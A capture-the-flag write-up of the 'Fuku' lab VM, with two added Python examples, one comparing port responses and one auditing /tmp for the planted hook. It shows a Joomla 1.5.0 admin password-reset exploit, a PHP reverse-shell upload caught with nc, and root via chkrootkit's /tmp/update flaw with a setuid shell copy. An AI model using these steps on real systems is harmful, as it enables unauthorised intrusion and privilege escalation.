published on in writeup
tags: sectalks

BNE0x02 - Fuku

Fuku CTF

Fuku (pronounced “far queue”) CTF is designed to fuck with people.

There are a few flag.txt files to grab. The final one is in the /root/ directory. However, the ultimate goal is to get a root shell.

Scenario

“Bull was pissed when you broke into his Minotaur box. He has taken precautions with another website that he is hosting, implementing IDS, whitelisting, and obfuscation techniques. He is now taunting hackers to try and hack him, believing himself to be safe. It is up to you to put him in his place.”

Hints

Some scripting will probably be needed to find a useful port. If the machine seems to go down after a while, it probably hasn’t. This CTF isn’t called Fuku for nothing!

This VM was supremely fuckin annoying, as its IP address changes at regular intervals :)

We first find it at 192.168.56.102. So let’s port scan it.

[email protected]:~# nmap -n -p- 192.168.56.102
1/tcp     open  tcpmux
2/tcp     open  compressnet
3/tcp     open  compressnet
4/tcp     open  unknown
5/tcp     open  unknown
6/tcp     open  unknown
7/tcp     open  echo
8/tcp     open  unknown
9/tcp     open  discard
10/tcp    open  unknown
[...snip...]
65526/tcp open  unknown
65527/tcp open  unknown
65528/tcp open  unknown
65529/tcp open  unknown
65530/tcp open  unknown
65531/tcp open  unknown
65532/tcp open  unknown
65533/tcp open  unknown
65534/tcp open  unknown
65535/tcp open  unknown

Every mother-humping port appears open!

[email protected]:~# nc 192.168.56.102 80
HTTP/1.0 200 OK
Server: Apache/2.4.0 (Ubuntu)

<html>
<body>
FUKU!</body>
</html>

[email protected]:~# nc 192.168.56.102 8080
HTTP/1.0 200 OK
Server: Apache/2.4.2 (Ubuntu)

<html>
<body>
FUKU!</body>
</html>

[email protected]:~# nc 192.168.56.102 1234
HTTP/1.0 200 OK
Server: Apache/2.4.0 (Ubuntu)

<html>
<body>
FUKU!</body>
</html>

I suspect this may be some iptables magic, where it redirects every port to one on which Apache is listening. I manually checked a few common ports to see if anything was hiding; all I found was 22.

[email protected]:~# nc 192.168.56.102 22
SSH-2.0-OpenSSH_6.7p1 Ubuntu-5ubuntu1

Protocol mismatch.

I figured the easiest way to find something different between the ports was to fetch the content of each one and compare the data sizes or something.

#!/bin/bash
# Fetch whatever answers on every TCP port and save the body to a file named
# after the port number, so the sizes can be compared afterwards (ls -lS).
# Every wget is backgrounded at once, which is why this hammered the laptop.
for i in {1..65535}; do
	wget 192.168.56.131:$i -q -O $i -t 1 &
done

Be warned - this pretty much bricked my laptop :D and obviously halfway through the scan the IP address changed!!! Eventually, I got some results.

[email protected]:~/fuku# ls -lS | head
total 256612
-rw-r--r-- 1 root root 14179 Apr 15 20:06 13370
-rw-r--r-- 1 root root    58 Apr 15 20:06 22
-rw-r--r-- 1 root root    37 Apr 15 20:06 1
-rw-r--r-- 1 root root    37 Apr 15 20:06 10
-rw-r--r-- 1 root root    37 Apr 15 20:06 100
-rw-r--r-- 1 root root    37 Apr 15 20:06 10000
-rw-r--r-- 1 root root    37 Apr 15 20:06 10001
-rw-r--r-- 1 root root    37 Apr 15 20:06 10002

Reading the dump for port 13370, we can see this is an installation of Joomla. We can hop over in a browser for confirmation, and we see a lovely Japanese Rick Roll rendition.
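The size comparison above, generalised to hashing response bodies so that two different pages of the same length cannot hide each other, and with HTTP headers stripped first because the decoy's Server header is not even consistent between ports. This is an added example, not the author's script; the per-port responses are constructed from what the page shows, and the 13370 body is a placeholder for the Joomla front page.

```python
import hashlib
from collections import defaultdict

# Constructed sample of raw per-port responses, modelled on the page: most ports
# return the same decoy page (with varying Server header), 22 returns an SSH
# banner and 13370 stands in for the Joomla front page.
DECOY_BODY = b"<html>\n<body>\nFUKU!</body>\n</html>\n"
DECOY_A = b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.0 (Ubuntu)\r\n\r\n" + DECOY_BODY
DECOY_B = b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.2 (Ubuntu)\r\n\r\n" + DECOY_BODY
SAMPLE_RESPONSES = {
    1: DECOY_A, 10: DECOY_A, 80: DECOY_A, 443: DECOY_A, 1234: DECOY_A,
    8080: DECOY_B,
    22: b"SSH-2.0-OpenSSH_6.7p1 Ubuntu-5ubuntu1\r\n",
    13370: b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.0 (Ubuntu)\r\n\r\n"
           b"<html><head><title>Home</title></head><body>(placeholder Joomla page)</body></html>",
}

def body_of(raw):
    """Strip an HTTP header block if there is one; non-HTTP replies are used as-is."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    return body if sep else raw

def group_by_body(responses):
    """Map sha256(body) -> sorted list of ports that returned exactly that body."""
    groups = defaultdict(list)
    for port, raw in responses.items():
        groups[hashlib.sha256(body_of(raw)).hexdigest()].append(port)
    return {digest: sorted(ports) for digest, ports in groups.items()}

def odd_ports(responses):
    """Ports whose body differs from the most common one: the real services
    behind the catch-all redirect. Same idea as the page's ls -lS, but exact."""
    groups = group_by_body(responses)
    if not groups:
        return []
    decoy = max(groups.values(), key=len)
    return sorted(p for ports in groups.values() if ports is not decoy for p in ports)

if __name__ == "__main__":
    print(odd_ports(SAMPLE_RESPONSES))  # [22, 13370]
```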

Joomla

The version of Joomla installed is 1.5.0, which has a remote admin password change vulnerability. So we can navigate to /index.php?option=com_user&view=reset&layout=confirm, pop a ' in the text box and we’re free to set any new password we wish.

We can then navigate to /administrator and log in with our new creds; then get a PHP shell by uploading a backdoor into the template source code and requesting the page.

I just used /usr/share/webshells/php/php-reverse-shell.php for this.

[email protected]:~/fuku# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.124] 40273
haha! FUKU! Only root can run that command.
 05:38:31 up  1:14,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
haha! FUKU! Only root can run that command.
/bin/sh: 0: can't access tty; job control turned off
$ id
haha! FUKU! Only root can run that command.

It seems there’s some limitation going on with what commands we can run, which might get interesting.

Flag 1

$ cat /var/www/html/flag.txt
Did you find this flag by guessing? Or possibly by looking in the robots.txt file?
Maybe you found it after getting a shell, by using a command like "find / -name flag.txt" ?
Random keyboard smash: J7&fVbh2kTy[JgS"98$vF4#;>mGcT

Priv Esc

$ ps aux
root      1442  0.0  0.5   5732  2744 ?        S    04:24   0:00 /bin/bash /root/chkrootkit-0.49/run_chkrootkit

After a quick Google, we learn that there’s a pretty dumb vulnerability in this version of chkrootkit. It will basically execute /tmp/update as root. All we must do is place a script/binary there.

$ echo "#!/bin/sh">>update
$ echo "cp /bin/sh /tmp/sh">>update
$ echo "chmod 7777 /tmp/sh">>update
$ chmod +x update

A few minutes later…

-rwsrwsrwt 1 root     root     112204 Apr 16 06:04 sh

$ ./sh
cd /root
ls -l

-rw------- 1 root root       122 Jan  1  1970 flag.txt

cat flag.txt
Yep, this is a flag. It's worth over 9000 Internet points!
Random keyboard smash: lkhI6u%RdFEtDjJKIuuiI7i&*iuGf)8$d4gfh%4
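The planted /tmp/update and the setuid copy of sh it produced are exactly the artefacts a host-side audit should catch on a box still running this chkrootkit version. The following is an added example, not part of the writeup: a check that walks a temp directory for an update hook and for setuid/setgid regular files, run here against a constructed demo tree (file names and contents are made up).

```python
import os
import stat
import tempfile

def tmp_update_findings(tmp_dir="/tmp"):
    """Look under tmp_dir for the two artefacts the writeup leaves behind:
    a planted 'update' that chkrootkit's periodic root run would execute, and
    any setuid/setgid regular file (the dropped copy of sh). Returns a sorted
    list of (finding, path) tuples; an empty list means nothing was found."""
    findings = []
    hook = os.path.join(tmp_dir, "update")
    if os.path.lexists(hook):
        findings.append(("planted_update_hook", hook))
    for dirpath, _, filenames in os.walk(tmp_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks out of the tree
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append(("setuid_or_setgid_file", path))
    return sorted(findings)

def build_demo_tree():
    """Constructed scenario (a fresh temp dir, not the real /tmp): an executable
    'update' script, a setuid file named 'sh' (the page used mode 7777; 4755 is
    enough to be flagged) and one harmless file. Returns the directory path."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "update"), "w") as f:
        f.write("#!/bin/sh\n")  # contents are irrelevant to the check
    os.chmod(os.path.join(d, "update"), 0o755)
    with open(os.path.join(d, "sh"), "wb") as f:
        f.write(b"placeholder, not a real shell binary")
    os.chmod(os.path.join(d, "sh"), 0o4755)
    with open(os.path.join(d, "harmless.txt"), "w") as f:
        f.write("nothing to see\n")
    return d

if __name__ == "__main__":
    for kind, path in tmp_update_findings(build_demo_tree()):
        print(kind, path)
```

Run from cron a few minutes apart, this surfaces a planted hook before root's scheduled chkrootkit run gets to execute it.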